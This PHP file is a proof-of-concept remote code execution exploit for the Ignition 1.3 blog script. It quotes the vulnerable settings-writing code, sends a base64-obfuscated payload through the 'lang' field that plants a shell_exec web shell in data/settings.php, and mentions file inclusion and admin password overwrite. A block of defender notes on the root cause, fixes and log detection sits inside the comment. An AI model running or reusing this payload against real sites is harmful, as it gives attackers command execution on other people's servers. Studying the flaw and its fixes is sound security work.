<?php
/*
Ignition 1.3 Remote Code Execution Exploit by cOndemned
download: http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz

source of i-options.php

 1. <?php
 2. session_start();
 3. if ($_POST['submit']) {
 4.     if ($FH = @fopen('data/settings.php', 'w')) {
 5.         @fwrite($FH, '<?php $pass = "'.$_POST['pass'].'";
 6.         $uri = "'.$_POST['uri'].'";
 7.         $suri = "'.$_POST['suri'].'";
 8.         $blogtitle = "'.$_POST['title'].'";
 9.         $description = "'.$_POST['description'].'";
10.         $postid = "'.$_POST['id'].'";
11.         $author = "'.$_POST['author'].'";
12.         $skin = "'.$_POST['skin'].'";
13.         $gravatar = "'.$_POST['gravatar'].'";
14.         $twitter = "' . $_POST['twitter'] . '";
15.         $identica = "' . $_POST['identica'] . '";
16.         $book = "' . $_POST['book'] . '";
17.         $game = "' . $_POST['game'] . '";
18.         $language = "' . $_POST['lang'] . '";
19.
20.         require_once("template.php");
21.         require_once("lang/$language.php");');
22.         #fclose($FH);
23.     }

We can overwrite settings.php by simply sending a specially crafted POST request,
and put some evil code into one of the variables. After running my PoC the line
with the $language var will be:

    $language = "en";echo @shell_exec($_GET['cmd']);$wtf="";

Where "en" is the default language; without filling this field correctly the
admin will see an error while trying to access the blog index.

other attack scenarios:
 - attacker can use $_POST['language'] variable to exploit Local File Inclusion (lines 18 and 21)
 - fill $_POST['pass'] with new password (md5 hashed) to overwrite admin's password
 - etc...

Review notes (defender's reading of the quoted i-options.php excerpt):

 - Root cause: lines 5-21 build PHP *source code* by concatenating raw $_POST
   values into string literals and write it to data/settings.php. A double
   quote in any field closes the literal, so whatever follows is executed as
   PHP every time settings.php is included. This is code injection, not just
   a stored-XSS-style data problem.
 - In the excerpt shown, the only gate before the write is `if ($_POST['submit'])`;
   session_start() is called but no check of an authenticated admin session is
   visible. That may be handled outside the quoted lines - confirm against the
   full file before concluding the write is reachable unauthenticated.
 - $language is also interpolated into require_once("lang/$language.php")
   (line 21), so the same parameter drives a file-inclusion path.
 - Fixes: persist settings as data rather than code (e.g. json_encode into a
   file read back with json_decode, or var_export of validated scalars);
   allow-list 'lang' against the files actually present in lang/; require an
   authenticated session and a CSRF token on the POST; keep data/ outside the
   web root or non-writable by the web server user.
 - Detection: file-integrity monitoring on data/settings.php, and web-server
   logs showing a POST to i-options.php followed by GET requests to
   data/settings.php with a query string (the PoC below uses ?cmd=).
*/

// Base URL of the Ignition install the PoC talks to (trailing slash included).
$target = 'http://localhost/ignition/';

// Form fields as named in the quoted i-options.php excerpt. 'lang' carries the
// base64 payload the comment above describes; it lands on line 18 of the
// generated settings.php.
$post = array (
    'uri' => $target,
    'suri' => $target,
    'description' => 'Just another lame php blog script owned :<',
    'skin' => 'default',
    'lang' => base64_decode('ZW4iO2VjaG8gQHNoZWxsX2V4ZWMoJF9HRVRbJ2NtZCddKTskd3RmPSI='),
    'submit' => 1
);

// Single POST to i-options.php; the response body is captured but not inspected.
$sock = curl_init();
curl_setopt_array (
    $sock,
    array (
        CURLOPT_URL => "$target/i-options.php",
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($post)
    )
);
curl_exec($sock);
curl_close($sock);

echo "Check: $target/data/settings.php?cmd=[system_command]";
?>